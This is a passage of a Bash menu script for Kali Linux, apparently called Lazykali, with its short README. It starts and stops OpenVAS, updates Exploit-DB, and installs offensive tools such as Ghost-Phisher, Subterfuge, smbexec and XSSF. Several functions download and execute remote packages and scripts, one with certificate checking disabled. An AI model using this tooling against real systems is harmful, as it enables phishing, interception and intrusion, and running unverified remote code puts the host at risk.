database......\033[m 908 | This may take a while!!!!" 909 | openvasmd --migrate 910 | openvasmd --rebuild 911 | echo ok! 912 | 913 | echo -e "\e[31mStarting OpenVas Manager.\e[0m" 914 | openvasmd -p 9390 -a 127.0.0.1 915 | echo ok! 916 | 917 | echo -e "\e[31mStarting OpenVas Administrator.\e[0m" 918 | openvasad -a 127.0.0.1 -p 9393 919 | echo ok! 920 | 921 | echo -e "\e[31mStarting Greenbone Security Assistant.\e[0m" 922 | gsad --http-only --listen=127.0.0.1 -p 9392 923 | echo ok! All should be good! 924 | 925 | #is it up openvas scanner 926 | echo -e "$execstyle Checking if OpenVas Scanner is running..." 927 | ps -ef | grep -v grep | grep openvassd 928 | if [ $? -eq 1 ] 929 | then 930 | echo -e "$warnstyle OpenVas Scanner not running!" 931 | else 932 | echo -e "$infostyle OpenVas Scanner is running!!" 933 | fi 934 | 935 | #is it up openvas administrator 936 | echo -e "$execstyle Checking if OpenVas Administrator is running..." 937 | ps -ef | grep -v grep | grep openvasad 938 | if [ $? -eq 1 ] 939 | then 940 | echo -e "$warnstyle OpenVas Administrator not running!" 941 | else 942 | echo -e "$infostyle OpenVas Administrator is running!!" 943 | fi 944 | 945 | #is it up openvas manager 946 | echo -e "$execstyle Checking if OpenVas Manager is running..." 947 | ps -ef | grep -v grep | grep openvasmd 948 | if [ $? -eq 1 ] 949 | then 950 | echo -e "$warnstyle OpenVas Manager not running!" 951 | else 952 | echo -e "$infostyle OpenVas Manager is running!!" 953 | fi 954 | 955 | #is it up Greenbone Security Assistant 956 | echo -e "$execstyle Checking if Greenbone Security Assistant is running..." 957 | ps -ef | grep -v grep | grep gsad 958 | if [ $? -eq 1 ] 959 | then 960 | echo -e "$warnstyle Greenbone Security Assistant not running!" 961 | else 962 | echo -e "$infostyle Greenbone Security Assistant is running" 963 | fi 964 | 965 | #### all done! 966 | echo 967 | echo -e "\033[01;32mOK!!\033[m" 968 | echo -e "\033[31mAll Done!! :) \033[m 969 | OpenVas is running!! Open browser to 127.0.0.1:9392 or open Green Bone Security Desktop." 970 | } 971 | 972 | ########openvasstop 973 | function openvasstop { 974 | # style variables 975 | execstyle="[\e[01;32mx\e[00m]" # execute msgs style 976 | warnstyle="[\e[01;31m!\e[00m]" # warning msgs style 977 | infostyle="[\e[01;34mi\e[00m]" # informational msgs style 978 | 979 | #fun little banner 980 | clear 981 | echo -e "\e[01;32m 982 | ####### ###### ####### # # # # # ##### 983 | # # # # # ## # # # # # # # 984 | # # # # # # # # # # # # # 985 | # # ###### ##### # # # # # # # ##### 986 | # # # # # # # # # ####### # 987 | # # # # # ## # # # # # # 988 | ####### # ####### # # # # # ##### 989 | 990 | \e[0m" 991 | echo -e "\e[1;1m ..----=====*****(( Shutdown Script ))*******=====----..\e[0m" 992 | echo -e "\e[31m *************************************************************\e[0m" 993 | echo -e "\e[31m * *\e[0m" 994 | echo -e "\e[31m * \e[1;37mStopping All OpenVas Services \e[0;31m *\e[0m" 995 | echo -e "\e[31m * *\e[0m" 996 | echo -e "\e[31m *************************************************************\e[0m" 997 | 998 | #kill openvas scanner 999 | echo -e "$execstyle Checking OpenVas Scanner is running..." 1000 | ps -ef | grep -v grep | grep openvassd 1001 | if [ $? -eq 1 ] 1002 | then 1003 | echo -e "$warnstyle OpenVas Scanner not running!" 1004 | else 1005 | echo -e "$execstyle Stopping OpenVas Scanner..." 1006 | killall openvassd 1007 | echo -e "$infostyle OpenVas Scanner is dead!!" 1008 | fi 1009 | 1010 | #kill openvas administrator 1011 | echo -e "$execstyle Checking if OpenVas Administrator is running..." 1012 | ps -ef | grep -v grep | grep openvasad 1013 | if [ $? -eq 1 ] 1014 | then 1015 | echo -e "$warnstyle OpenVas Administrator not running!" 1016 | else 1017 | echo -e "$execstyle Stopping OpenVas Administrator..." 1018 | killall openvasad 1019 | echo -e "$infostyle OpenVas Administrator is dead!!" 1020 | fi 1021 | 1022 | #kill openvas manager 1023 | echo -e "$execstyle Checking if OpenVas Manager is running..." 1024 | ps -ef | grep -v grep | grep openvasmd 1025 | if [ $? -eq 1 ] 1026 | then 1027 | echo -e "$warnstyle OpenVas Manager not running!" 1028 | else 1029 | echo -e "$execstyle Stopping OpenVas Manager..." 1030 | killall openvasmd 1031 | echo -e "$infostyle OpenVas Manager is dead!!" 1032 | fi 1033 | 1034 | #kill Greenbone Security Assistant 1035 | echo -e "$execstyle Checking if Greenbone Security Assistant is running..." 1036 | ps -ef | grep -v grep | grep gsad 1037 | if [ $? -eq 1 ] 1038 | then 1039 | echo -e "$warnstyle Greenbone Security Assistant not running!" 1040 | else 1041 | echo -e "$execstyle Stopping Greenbone Security Assistant..." 1042 | killall gsad 1043 | echo -e "$infostyle Greenbone Security Assistant is dead!!" 1044 | 1045 | fi 1046 | 1047 | #### all done! 1048 | echo 1049 | echo -e "\033[01;32m All Done!! :) \033[m" 1050 | } 1051 | 1052 | ######## Rollback Openvas to Version 5 1053 | function rollbackopenvas { 1054 | echo -e "\033[31mThis script will roll OpenVas back to Version 5\033[m" 1055 | echo -e "\033[31myou may need this if you broke Openvas with apt-get dist-upgrade\033[m" 1056 | echo "Do you want to rollback ? (Y/N)" 1057 | read install 1058 | if [[ $install = Y || $install = y ]] ; then 1059 | echo -e "\033[31m====== Rolling OpenVas back to V5 ======\033[m" 1060 | apt-get remove --purge greenbone-security-assistant libopenvas6 openvas-administrator openvas-manager openvas-cli openvas-scanner 1061 | mkdir openvasfix 1062 | cd openvasfix 1063 | if [ $(uname -m) == "x86_64" ] ; then 1064 | #64 bit system 1065 | wget http://repo.kali.org/kali/pool/main/o/openvas-manager/openvas-manager_3.0.4-1kali0_amd64.deb 1066 | wget http://repo.kali.org/kali/pool/main/o/openvas-administrator/openvas-administrator_1.2.1-1kali0_amd64.deb 1067 | wget http://repo.kali.org/kali/pool/main/o/openvas-cli/openvas-cli_1.1.5-1kali0_amd64.deb 1068 | wget http://repo.kali.org/kali/pool/main/o/openvas-scanner/openvas-scanner_3.3.1-1kali1_amd64.deb 1069 | wget http://repo.kali.org/kali/pool/main/o/openvas/openvas_1.1_amd64.deb 1070 | wget http://repo.kali.org/kali/pool/main/g/greenbone-security-assistant/greenbone-security-assistant_3.0.3-1kali0_amd64.deb 1071 | wget http://repo.kali.org/kali/pool/main/libo/libopenvas/libopenvas5_5.0.4-1kali0_amd64.deb 1072 | else 1073 | #32 bit system 1074 | wget http://repo.kali.org/kali/pool/main/o/openvas-manager/openvas-manager_3.0.4-1kali0_i386.deb 1075 | wget http://repo.kali.org/kali/pool/main/o/openvas-administrator/openvas-administrator_1.2.1-1kali0_i386.deb 1076 | wget http://repo.kali.org/kali/pool/main/o/openvas-cli/openvas-cli_1.1.5-1kali0_i386.deb 1077 | wget http://repo.kali.org/kali/pool/main/o/openvas-scanner/openvas-scanner_3.3.1-1kali1_i386.deb 1078 | wget http://repo.kali.org/kali/pool/main/o/openvas/openvas_1.1_i386.deb 1079 | wget http://repo.kali.org/kali/pool/main/g/greenbone-security-assistant/greenbone-security-assistant_3.0.3-1kali0_i386.deb 1080 | wget http://repo.kali.org/kali/pool/main/libo/libopenvas/libopenvas5_5.0.4-1kali0_i386.deb 1081 | fi 1082 | dpkg -i * 1083 | apt-get install gsd kali-linux kali-linux-full 1084 | wget --no-check-certificate https://svn.wald.intevation.org/svn/openvas/trunk/tools/openvas-check-setup 1085 | chmod +x openvas-check-setup 1086 | ./openvas-check-setup --v5 1087 | else 1088 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 1089 | fi 1090 | echo -e "\e[32m[-] Done!\e[0m" 1091 | } 1092 | 1093 | ### Update Exploitdb 1094 | function updateexploitdb { 1095 | echo -e "\033[31mThis script will update your Exploitdb\033[m" 1096 | cd /usr/share/exploitdb 1097 | rm -rf archive.tar.bz2 1098 | wget http://www.exploit-db.com/archive.tar.bz2 1099 | tar xvfj archive.tar.bz2 1100 | rm -rf archive.tar.bz2 1101 | echo -e "\e[32m[-] Done Updating Exploitdb!\e[0m" 1102 | } 1103 | 1104 | #### Searchsploit 1105 | function searchsploit { 1106 | echo -e "\033[31mWhat do you want to Hack Today?\033[m" 1107 | echo -e "\033[31mEnter a search term and hit Enter\033[m" 1108 | read searchterm 1109 | gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2 1110 | 1111 | } 1112 | 1113 | #### Install Subterfuge 1114 | function installsubterfuge { 1115 | echo "This will install Subterfuge. Do you want to install it ? (Y/N)" 1116 | read install 1117 | if [[ $install = Y || $install = y ]] ; then 1118 | echo -e "\e[31m[+] Installing Subterfuge now!\e[0m" 1119 | cd /tmp 1120 | wget http://subterfuge.googlecode.com/files/SubterfugePublicBeta5.0.tar.gz 1121 | tar zxvf SubterfugePublicBeta5.0.tar.gz 1122 | cd subterfuge 1123 | python install.py 1124 | cd ../ 1125 | rm -rf subterfuge/ 1126 | rm SubterfugePublicBeta5.0.tar.gz 1127 | echo -e "\e[32m[-] Done Installing Subterfuge!\e[0m" 1128 | else 1129 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 1130 | fi 1131 | } 1132 | ##### Subterfuge 1133 | function subterfuge { 1134 | if [ ! -f /usr/local/bin/unicornscan ]; then 1135 | installsubterfuge 1136 | else 1137 | echo "Subterfuge is installed." 1138 | echo -e "\e[31m[+] Launching Subterfuge now!\e[0m" 1139 | echo "leave the window that opens open until done using." 1140 | gnome-terminal -t "Subterfuge" -e subterfuge 2>/dev/null & sleep 2 1141 | fi 1142 | } 1143 | 1144 | ##### Ghost-Phisher 1145 | function ghostphisher { 1146 | if [ ! -f /opt/Ghost-Phisher/ghost.py ]; then 1147 | installghostphisher 1148 | else 1149 | echo "Ghost-Phisher is installed." 1150 | echo -e "\e[31m[+] Launching Ghost-Phisher now!\e[0m" 1151 | python /opt/Ghost-Phisher/ghost.py 2>/dev/null & sleep 2 1152 | fi 1153 | } 1154 | 1155 | ######## Install Ghost-Phisher 1156 | function installghostphisher { 1157 | echo "This will install Ghost-Phisher. Do you want to install it ? (Y/N)" 1158 | read install 1159 | if [[ $install = Y || $install = y ]] ; then 1160 | echo -e "\e[31m[+] Installing Ghost-Phisher now!\e[0m" 1161 | cd /tmp 1162 | wget http://ghost-phisher.googlecode.com/files/Ghost-Phisher_1.5_all.deb 1163 | dpkg -i Ghost-Phisher_1.5_all.deb 1164 | rm Ghost-Phisher_1.5_all.deb 1165 | echo -e "\e[32m[-] Done Installing GhostFisher!\e[0m" 1166 | else 1167 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 1168 | fi 1169 | 1170 | 1171 | } 1172 | 1173 | ######## Install Flash 1174 | function installflash { 1175 | echo "This will install Flash. Do you want to install it ? (Y/N)" 1176 | read install 1177 | if [[ $install = Y || $install = y ]] ; then 1178 | echo -e "\e[31m[+] Installing Flash now!\e[0m" 1179 | apt-get -y install flashplugin-nonfree 1180 | update-flashplugin-nonfree --install 1181 | echo -e "\e[32m[-] Done Installing Flash!\e[0m" 1182 | else 1183 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 1184 | fi 1185 | 1186 | 1187 | } 1188 | 1189 | ######## Install smbexec 1190 | function installsmbexec { 1191 | echo "This will install Smbexec. Do you want to install it ? (Y/N)" 1192 | read install 1193 | if [[ $install = Y || $install = y ]] ; then 1194 | echo -e "\e[31m[+] Installing Smbexec now!\e[0m" 1195 | cd /opt 1196 | git clone https://github.com/brav0hax/smbexec.git 1197 | cd smbexec 1198 | ./install.sh 1199 | echo -e "\e[32m[-] Done Installing Smbexec part 1!\e[0m" 1200 | echo -e "\e[31m[+] Now for part 2 Compile the binaries, select option 4!\e[0m" 1201 | ./install.sh 1202 | echo -e "\e[32m[-] Done Installing Smbexec!\e[0m" 1203 | echo "Open a terminal and type smbexec, have fun!" 1204 | else 1205 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 1206 | fi 1207 | 1208 | 1209 | } 1210 | 1211 | ######## Install xssf 1212 | function installxssf { 1213 | echo "This will install Xssf. Do you want to install it ? (Y/N)" 1214 | read install 1215 | if [[ $install = Y || $install = y ]] ; then 1216 | echo -e "\e[31m[+] Installing Xssf now!\e[0m" 1217 | cd /opt/metasploit/apps/pro/msf3 1218 | svn export http://xssf.googlecode.com/svn/trunk ./ --force 1219 | echo -e "\e[32m[-] Done Installing Xssf!\e[0m" 1220 | echo -e "\e[32m[-]Open a terminal launch msfconsole \n then inside metasploit type 'load xssf Port=666' or what everport number you want\e[0m" 1221 | else 1222 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 1223 | fi 1224 | } 1225 | 1226 | ######### Install extras 1227 | function extras { 1228 | clear 1229 | echo -e " 1230 | \033[31m#######################################################\033[m 1231 | Install Extras 1232 | \033[31m#######################################################\033[m" 1233 | 1234 | select menusel in "Bleeding Edge Repos" "Hackpack" "Google Chrome" "Flash" "Smbexec" "Xssf" "Ettercap 0.76" "AngryIP Scanner" "Terminator" "Xchat" "Unicornscan" "Nautilus Open Terminal" "Simple-Ducky" "Subterfuge" "Ghost-Phisher" "Java" "Install All" "Back to Main"; do 1235 | case $menusel in 1236 | "Bleeding Edge Repos") 1237 | bleedingedge 1238 | pause 1239 | extras;; 1240 | 1241 | "Hackpack") 1242 | installhackpack 1243 | pause 1244 | extras;; 1245 | 1246 | "Google Chrome") 1247 | installgooglechrome 1248 | pause 1249 | extras;; 1250 | 1251 | "Flash") 1252 | installflash 1253 | pause 1254 | extras;; 1255 | 1256 | "Smbexec") 1257 | installsmbexec 1258 | pause 1259 | extras;; 1260 | 1261 | "Xssf") 1262 | installxssf 1263 | pause 1264 | extras;; 1265 | 1266 | "Ettercap 0.76") 1267 | installettercap 1268 | pause 1269 | extras ;; 1270 | 1271 | "AngryIP Scanner") 1272 | installangryip 1273 | pause 1274 | extras ;; 1275 | 1276 | "Terminator") 1277 | installterminator 1278 | pause 1279 | extras ;; 1280 | 1281 | "Xchat") 1282 | installxchat 1283 | pause 1284 | extras ;; 1285 | 1286 | "Unicornscan") 1287 | installunicornscan 1288 | pause 1289 | extras ;; 1290 | 1291 | "Nautilus Open Terminal") 1292 | installnautilusopenterm 1293 | pause 1294 | extras ;; 1295 | 1296 | "Simple-Ducky") 1297 | installsimpleducky 1298 | pause 1299 | extras ;; 1300 | 1301 | "Subterfuge") 1302 | installsubterfuge 1303 | pause 1304 | extras ;; 1305 | 1306 | "Ghost-Phisher") 1307 | installghostphisher 1308 | pause 1309 | extras ;; 1310 | 1311 | "Java") 1312 | installjava 1313 | pause 1314 | extras ;; 1315 | 1316 | "Install All") 1317 | echo -e "\e[36mJava is install seperately choose it from the extra's menu\e[0m" 1318 | echo -e "\e[31m[+] Installing Extra's\e[0m" 1319 | bleedingedge 1320 | installhackpack 1321 | installgooglechrome 1322 | installflash 1323 | installangryip 1324 | installterminator 1325 | installxchat 1326 | installsmbexec 1327 | installxssf 1328 | installunicornscan 1329 | installnautilusopenterm 1330 | installsimpleducky 1331 | installghostphisher 1332 | installsubterfuge 1333 | echo -e "\e[32m[-] Done Installing Extra's\e[0m" 1334 | pause 1335 | extras ;; 1336 | 1337 | 1338 | "Back to Main") 1339 | clear 1340 | mainmenu ;; 1341 | 1342 | *) 1343 | screwup 1344 | extras ;; 1345 | 1346 | 1347 | esac 1348 | 1349 | break 1350 | 1351 | done 1352 | } 1353 | ######################################################## 1354 | ## Main Menu Section 1355 | ######################################################## 1356 | function mainmenu { 1357 | echo -e " 1358 | \033[31m################################################################\033[m 1359 | \033[1;36m 1360 | .____ ____ __. .__ .__ 1361 | | | _____ ___________.__.| |/ _|____ | | |__| 1362 | | | \__ \ \___ < | || < \__ \ | | | | 1363 | | |___ / __ \_/ / \___ || | \ / __ \| |_| | 1364 | |_______ (____ /_____ \/ ____||____|__ (____ /____/__| 1365 | \/ \/ \/\/ \/ \/ 1366 | 1367 | \033[m 1368 | Script by soufian-hamada 1369 | version : \033[32m$version\033[m 1370 | Script Location : \033[32m$0\033[m 1371 | Connection Info :----------------------------------------------- 1372 | Gateway: \033[32m$DEFAULT_ROUTE\033[m Interface: \033[32m$IFACE\033[m My LAN Ip: \033[32m$MYIP\033[m 1373 | \033[31m################################################################\033[m" 1374 | 1375 | select menusel in "Update Kali" "Metasploit Services" "OpenVas Services" "Exploitdb" "Sniffing/Spoofing" "Install Extras" "Payload Gen" "HELP!" "Credits" "EXIT PROGRAM"; do 1376 | case $menusel in 1377 | "Update Kali") 1378 | updatekali 1379 | clear ;; 1380 | 1381 | "Metasploit Services") 1382 | metasploitservices 1383 | clear ;; 1384 | 1385 | "OpenVas Services") 1386 | OpenVas 1387 | clear ;; 1388 | 1389 | "Exploitdb") 1390 | exploitdb 1391 | clear ;; 1392 | 1393 | "Sniffing/Spoofing") 1394 | sniffspoof 1395 | clear ;; 1396 | 1397 | "Install Extras") 1398 | extras 1399 | clear ;; 1400 | 1401 | "Payload Gen") 1402 | payloadgen 1403 | clear ;; 1404 | 1405 | "HELP!") 1406 | echo "What do you need help for, seems pretty simple!" 1407 | pause 1408 | clear ;; 1409 | 1410 | "Credits") 1411 | credits 1412 | pause 1413 | clear ;; 1414 | 1415 | "EXIT PROGRAM") 1416 | clear && exit 0 ;; 1417 | 1418 | * ) 1419 | screwup 1420 | clear ;; 1421 | esac 1422 | 1423 | break 1424 | 1425 | done 1426 | } 1427 | 1428 | while true; do mainmenu; done 1429 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Lazykali 2 | ======== 3 | 4 | hackpack to go with lazykali on menu application Kali Linux 5 | --------------------------------------------------------------------------------